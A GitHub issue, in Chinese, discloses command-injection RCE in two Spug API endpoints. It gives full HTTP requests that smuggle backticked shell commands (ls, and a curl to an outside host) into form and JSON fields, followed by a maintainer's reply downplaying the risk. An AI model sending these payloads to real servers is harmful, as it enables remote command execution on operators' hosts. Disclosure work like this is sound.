### ISSUE TITLE
安全问题: spug两个API接口存在远程代码执行漏洞

### ISSUE THREAD

**Issue by ZjieHU** [openspug/spug#621]
Spug 版本:<=3.0

## 问题重现步骤

API 1、【POST】http://demo.spug.cc/api/deploy/request/upload/   参数deploy_id
POST /api/deploy/request/upload/ HTTP/1.1
Host: demo.spug.cc
Content-Length: 285
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryI8BLankii1rNykEB
X-Token: bb9c6eae439b459590efc06f7e8ca741
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://demo.spug.cc
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.spug.cc/exec/transfer
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryI8BLankii1rNykEB
Content-Disposition: form-data; name="file"; filename="1.txt"
Content-Type: text/html

111

------WebKitFormBoundaryI8BLankii1rNykEB
Content-Disposition: form-data; name="deploy_id"

111\`ls\`
------WebKitFormBoundaryI8BLankii1rNykEB--

API 2、【POST】http://demo.spug.cc/api/monitor/test/  参数targets
POST /api/monitor/test/ HTTP/1.1
Host: demo.spug.cc
Content-Length: 58
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Accept: application/json, text/plain, */*
Content-Type: application/json
X-Token: bb9c6eae439b459590efc06f7e8ca741
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://demo.spug.cc
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.spug.cc/monitor
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"type":"5","targets":["http://xxx.com/\`curl xxx.baidu\`"]}

## 期望的结果
可以在主机执行命令

**Comment by vapao** [comment]
访问这两个接口的前提是先登录系统，如果可以合法的登录系统，能做的操作就很多了，毕竟这是个运维平台。这些问题放在一个内部系统且需要登录之后才能利用，目前认为威胁并不大。
